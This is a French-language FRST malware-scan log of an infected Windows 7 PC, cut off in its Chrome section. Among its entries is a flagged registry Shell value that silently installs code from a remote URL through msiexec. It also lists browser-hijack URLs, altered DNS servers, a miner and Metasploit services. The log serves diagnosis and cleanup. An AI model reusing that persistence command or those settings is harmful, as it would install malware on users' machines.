Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 10.10.2018 Exécuté par Home (administrateur) sur HOME-PC (11-10-2018 22:29:38) Exécuté depuis C:\Users\Home\AppData\Local\Temp\scoped_dir6788_22833 Profils chargés: Home (Profils disponibles: Home & Administrateur) Platform: Windows 7 Professional Service Pack 1 (X64) Langue: Français (France) Internet Explorer Version 11 (Navigateur par défaut: "C:\Program Files (x86)\Applemy\Application\chrome.exe" -- "%1") Mode d'amorçage: Normal Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe (Baidu, Inc.) C:\Program Files (x86)\Baidu Security\MoboMarket\1.2.8.4379\bassvc.exe () C:\Program Files (x86)\Explorer\iedvutils.exe (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe (Apache Software Foundation) C:\xampp\apache\bin\httpd.exe (IEC) C:\Program Files (x86)\BikaQRss\BikaQ.exe (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe () C:\Program Files (x86)\D-Link\DWA-140 revB\ANIWConnService.exe (Apache Software Foundation) C:\xampp\apache\bin\httpd.exe (Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe () C:\Program Files (x86)\Droid4X\Droid4XService.exe (Intel) C:\Program Files (x86)\Intel Driver Update Utility\DSAService.exe () C:\Program Files (x86)\ExpressVPN\bootstrap\AMD64\nssm.exe () C:\Program Files (x86)\ExpressVPN\xvpnd\xvpnd.exe (Nero AG) C:\Program Files (x86)\HTC\HTC Sync Manager\HSMServiceEntry.exe (Visicom Media Inc.) C:\ProgramData\ManyCam\Service\service.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\pg_ctl.exe (hxxp://www.ruby-lang.org/) C:\metasploit\ruby\bin\ruby.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe (hxxp://www.ruby-lang.org/) C:\metasploit\ruby\bin\ruby.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe (hxxp://www.ruby-lang.org/) C:\metasploit\ruby\bin\ruby.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe (PostgreSQL Global Development Group) C:\metasploit\postgresql\bin\postgres.exe () C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe (pdfforge GmbH) C:\Program Files\PDF Architect 4\creator-ws.exe (© pdfforge GmbH.) C:\ProgramData\pdfforge\PDF Architect 4 Manager\PDF Architect 4\Architect Manager.exe (Baidu Inc.) C:\Program Files (x86)\baidu\Baidu Browser\sparkservice.exe (DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe () C:\Program Files (x86)\CalendarTool\2.0.0.1000176\CalendarServ.exe (TunnelBear) C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe (Windscribe Limited) C:\Program Files (x86)\Windscribe\WindscribeService.exe (CyberGhost S.A.) C:\Program Files\CyberGhost 6\CyberGhost.Service.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe () C:\Program Files (x86)\CalendarTool\2.0.0.1000176\calendar.exe (IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe () C:\Program Files (x86)\HTC\HTC Sync Manager\HTC Sync\adb.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe (Hewlett-Packard ) C:\Program Files\IDT\WDM\Beats64.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-140 revB\AirNCFG.exe (Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe Impossible d'accéder au processus -> 7.10.4_44633.exe (pdfforge GmbH) C:\Program Files\PDF Architect 4\ws.exe (Greenshot) C:\Program Files\Greenshot\Greenshot.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registre (Avec liste blanche) =========================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1703424 2013-11-12] (IDT, Inc.) HKLM\...\Run: [BeatsOSDApp] => C:\Program Files\IDT\WDM\beats64.exe [41664 2013-11-12] (Hewlett-Packard ) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation) HKLM\...\Run: [AgentAntidote32] => C:\Program Files (x86)\Druide\Antidote 9\Application\Bin32\AgentAntidote.exe [1505824 2015-12-08] (Druide informatique inc.) HKLM\...\Run: [AgentAntidote64] => C:\Program Files (x86)\Druide\Antidote 9\Application\Bin64\AgentAntidote.exe [1633312 2015-12-08] (Druide informatique inc.) HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2171304 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2015-06-29] (Adobe Systems Incorporated) HKLM-x32\...\Run: [LocalCooling] => C:\Program Files (x86)\LocalCooling\localcooling.exe [2056875 2006-12-01] () HKLM-x32\...\Run: [RazerGameBooster] => C:\Program Files (x86)\Razer\Razer Game Booster\RazerGameBooster.exe [61152 2014-02-25] (Razer Inc.) HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3784512 2018-10-09] (Dropbox, Inc.) HKLM-x32\...\Run: [D-Link D-Link Wireless N DWA-140] => C:\Program Files (x86)\D-Link\DWA-140 revB\AirNCFG.exe [1079600 2013-01-29] (D-Link Corp.) HKLM-x32\...\Run: [DSATray] => C:\Program Files (x86)\Intel Driver Update Utility\DsaTray.exe [132856 2017-05-18] (Intel) HKLM-x32\...\Run: [D3DOverrider] => C:\Users\Home\Downloads\NO LAG\NO LAG\D3DOverrider\D3DOverrider\D3DOverriderWrapper.exe [40960 2009-08-22] () HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [588704 2018-03-28] (Oracle Corporation) HKLM\...\Winlogon: [Userinit] C:\Windows\system32\userinit.exe,C:\Windows\system32\Screen564532318,C:\Windows\system32\Elsword Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-19\...\Run: [TunnelBear] => C:\Program Files (x86)\TunnelBear\TunnelBear.UI.exe [1352064 2017-06-13] (TunnelBear) HKU\S-1-5-20\...\Run: [TunnelBear] => C:\Program Files (x86)\TunnelBear\TunnelBear.UI.exe [1352064 2017-06-13] (TunnelBear) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [BingSvc] => C:\Users\Home\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Discord] => C:\Users\Home\AppData\Local\Discord\app-0.0.301\Discord.exe [57816920 2018-04-30] (Discord Inc.) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [ManyCam] => C:\Program Files (x86)\ManyCam\ManyCam.exe [10116392 2015-12-21] (Visicom Media Inc.) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [MurGee.com Auto Keyboard] => C:\ProgramData\Auto Keyboard\AutoKeyboard.exe [83440 2015-03-27] (MurGee.com) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [MinerGateGui] => C:\Program Files\MinerGate\minergate.exe [18374656 2018-04-05] () HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [TunnelBear] => C:\Program Files (x86)\TunnelBear\TunnelBear.UI.exe [1352064 2017-06-13] (TunnelBear) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27832264 2017-10-10] (Skype Technologies S.A.) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [CyberGhost] => C:\Program Files\CyberGhost 6\CyberGhost.exe [1398352 2018-06-11] (CyberGhost S.A.) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Advanced SystemCare 11] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3580688 2018-05-23] (IObit) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [729704 2018-06-20] (Disc Soft Ltd) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [12476064 2018-03-07] () HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited) HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81RjMyFUE8Ndq4FdVQFdHyNdZQNYY5NYF5NYYcNkZWOH== /q <==== ATTENTION HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: J - J:\setup.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {0120d288-4122-11e6-9dcf-e840f20cf0e1} - K:\SetUp.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {0120d28c-4122-11e6-9dcf-e840f20cf0e1} - L:\autorun.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {2e563ae9-8acd-11e5-a21a-806e6f6e6963} - D:\startHG.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {6cb05c34-c1e0-11e5-91c1-e840f20cf0e1} - J:\Demonbane_Setup.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {894b5052-c9a1-11e5-aad9-e840f20cf0e1} - E:\SetuP.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {ab008eac-5112-11e8-9b5a-b8a3860375f4} - K:\setup\setup.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {f2e1b256-28f7-11e7-88dd-e840f20cf0e1} - J:\setup.exe HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\MountPoints2: {f38c2f98-97cb-11e8-92d8-b8a3860375f4} - J:\setup.exe HKU\S-1-5-18\...\Run: [TunnelBear] => C:\Program Files (x86)\TunnelBear\TunnelBear.UI.exe [1352064 2017-06-13] (TunnelBear) ShellExecuteHooks: Pas de nom - {48F04F78-DE45-11E6-8A81-64006A5CFC23} - -> Pas de fichier Startup: C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-07-19] ShortcutTarget: MEGAsync.lnk -> C:\ProgramData\MEGAsync\MEGAsync.exe (Mega Limited) GroupPolicy: Restriction ? <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4 Tcpip\..\Interfaces\{6237DF49-4995-45B9-B972-9E0DCCB74142}: [NameServer] 188.120.241.135,8.8.8.8 Tcpip\..\Interfaces\{6237DF49-4995-45B9-B972-9E0DCCB74142}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{A349F174-5F77-453F-9CDA-C0ED141C20B0}: [NameServer] 188.120.241.135,8.8.8.8 Tcpip\..\Interfaces\{A349F174-5F77-453F-9CDA-C0ED141C20B0}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131754701441065073&GUID=F503A5A7-0A53-4840-8134-35C2FA7C2C25 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131754701444845289&GUID=F503A5A7-0A53-4840-8134-35C2FA7C2C25 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131754701445585332&GUID=F503A5A7-0A53-4840-8134-35C2FA7C2C25 HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-3527481349-2306919907-3425379913-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2018-07-19] (IObit) BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation) BHO-x32: PDF Architect 4 Helper -> {38279E1A-7019-40C1-B579-E99DFB3312E8} -> C:\Program Files (x86)\PDF Architect 4\creator-ie-helper.dll [2016-08-05] (pdfforge GmbH) BHO-x32: ATLAS Toolbar -> {3C6301ED-0F78-4AF2-8150-D9C052361A8E} -> C:\Program Files (x86)\ATLAS V14\ATLIECP.DLL [2009-06-26] (FUJITSU LIMITED) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_171\bin\ssv.dll [2018-05-26] (Oracle Corporation) BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation) BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_171\bin\jp2ssv.dll [2018-05-26] (Oracle Corporation) Toolbar: HKLM-x32 - ATLAS Toolbar - {3C6301ED-0F78-4AF2-8150-D9C052361A8E} - C:\Program Files (x86)\ATLAS V14\ATLIECP.DLL [2009-06-26] (FUJITSU LIMITED) Toolbar: HKLM-x32 - PDF Architect 4 Toolbar - {23FD9C33-A9E1-48A1-8404-E5925CF1C8E1} - C:\Program Files (x86)\PDF Architect 4\creator-ie-plugin.dll [2016-08-05] (pdfforge GmbH) Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation) Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation) FireFox: ======== FF DefaultProfile: mshb929h.default FF ProfilePath: C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default [2018-10-11] FF user.js: detected! => C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default\user.js [2018-08-02] FF Homepage: Mozilla\Firefox\Profiles\mshb929h.default -> hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE FF Extension: (IPFlood) - C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default\Extensions\ipfuck@p4ul.info.xpi [2016-07-15] [Legacy] FF Extension: (EPUBReader) - C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default\Extensions\{5384767E-00D9-40E9-B72F-9CC39D655D6F} [2017-02-04] [Legacy] FF Extension: (ReloadEvery) - C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default\Extensions\{888d99e7-e8b5-46a3-851e-1ec45da1e644}.xpi [2016-07-15] [Legacy] FF SearchPlugin: C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default\searchplugins\ourluckysites.xml [2017-05-27] FF SearchPlugin: C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\mshb929h.default\searchplugins\startpageing123.xml [2017-03-27] FF ProfilePath: C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default [2018-07-04] <==== ATTENTION FF Homepage: Firefox\Firefox\Profiles\mshb929h.default -> hxxp://www.searchinme.com//?type=hp&ts=1491131689116&z=c56067e3954302c913f737bg2zab3m3b5b0e2g7cbw&from=official&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE FF Extension: (Clipboard Inserter) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\@clipboard-inserter.xpi [2018-07-02] FF Extension: (SimilarWeb) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-07] [Legacy] [non signé] FF Extension: (FF Adr) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-02-23] [non signé] FF Extension: (IPFlood) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\ipfuck@p4ul.info.xpi [2016-07-15] [Legacy] FF Extension: (ExHentai Easy 2) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\jid1-7NbXi2AqS1oUFw@jetpack.xpi [2017-12-24] [Legacy] FF Extension: (Easy media download) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\jid1-ach2kaGSshPJCg@jetpack.xpi [2017-03-29] [Legacy] FF Extension: (AdBlock for Firefox) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\jid1-NIfFY2CA8fy1tg@jetpack.xpi [2017-03-29] [Legacy] FF Extension: (Français Language Pack) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\langpack-fr@firefox.mozilla.org.xpi [2017-03-15] [Legacy] [non signé] FF Extension: (Rikaichan Japanese-English Dictionary File) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\rikaichan-jpen@polarcloud.com [2018-01-06] [Legacy] FF Extension: (Rikaichan Japanese Names Dictionary File) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\rikaichan-jpnames@polarcloud.com [2018-01-06] [Legacy] FF Extension: (Anki 划词制卡助手) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\zhenyu.huang@qq.com.xpi [2018-07-02] FF Extension: (EPUBReader) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\{5384767E-00D9-40E9-B72F-9CC39D655D6F} [2017-03-07] [Legacy] FF Extension: (Rikaisama) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\{697F6AFE-5321-4DE1-BFE6-4471C3721BD4} [2018-01-06] [Legacy] FF Extension: (Bulk Media Downloader) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\{72b2e02b-3a71-4895-886c-fd12ebe36ba3}.xpi [2017-09-05] FF Extension: (ReloadEvery) - C:\Users\Home\AppData\Roaming\Firefox\Firefox\Profiles\mshb929h.default\Extensions\{888d99e7-e8b5-46a3-851e-1ec45da1e644}.xpi [2016-07-15] [Legacy] FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06] [Legacy] FF HKLM\...\Firefox\Extensions: [pdf_architect_4_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 4\resources\pdfarchitect4firefoxextension FF Extension: (PDF Architect 4 Creator) - C:\Program Files\PDF Architect 4\resources\pdfarchitect4firefoxextension [2016-08-18] [Legacy] [non signé] FF HKLM-x32\...\Firefox\Extensions: [belgiumeid@eid.belgium.be] - C:\Program Files (x86)\Mozilla Firefox\extensions\belgiumeid@eid.belgium.be FF Extension: (Belgium eID) - C:\Program Files (x86)\Mozilla Firefox\extensions\belgiumeid@eid.belgium.be [2017-04-03] [Legacy] FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN) FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1229199.dll [2017-03-31] (Adobe Systems, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=11.171.2 -> C:\Program Files (x86)\Java\jre1.8.0_171\bin\dtplugin\npDeployJava1.dll [2018-05-26] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.171.2 -> C:\Program Files (x86)\Java\jre1.8.0_171\bin\plugin2\npjp2.dll [2018-05-26] (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) FF Plugin-x32: PDF Architect 4 -> C:\Program Files (x86)\PDF Architect 4\np-previewer.dll [2016-08-05] (pdfforge GmbH) Chrome: ======= CHR DefaultProfile: ChromeDefaultData2 CHR Profile: C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2018-10-11] <==== ATTENTION CHR Extension: (Flash Video Downloader) - C:\Users\Home\AppData\Local\Google\Chrome\User 